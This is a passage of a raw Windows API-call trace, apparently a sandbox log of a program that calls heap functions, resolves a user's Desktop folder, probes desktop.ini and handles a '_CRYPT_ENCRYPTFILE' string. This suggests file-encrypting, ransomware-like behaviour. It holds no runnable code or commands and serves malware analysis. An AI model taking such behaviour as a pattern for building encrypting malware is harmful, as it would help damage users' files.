lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0141.840] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0141.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0141.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0141.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0141.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0141.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0141.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0141.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0141.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0141.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0141.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0141.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0141.841] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0141.841] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0141.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0141.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0141.841] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0141.842] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0141.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0141.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0141.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0141.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0141.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0141.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0141.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0141.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0141.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0141.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0141.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0141.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0141.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0141.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0141.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0141.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0141.847] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87550 [0141.847] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, 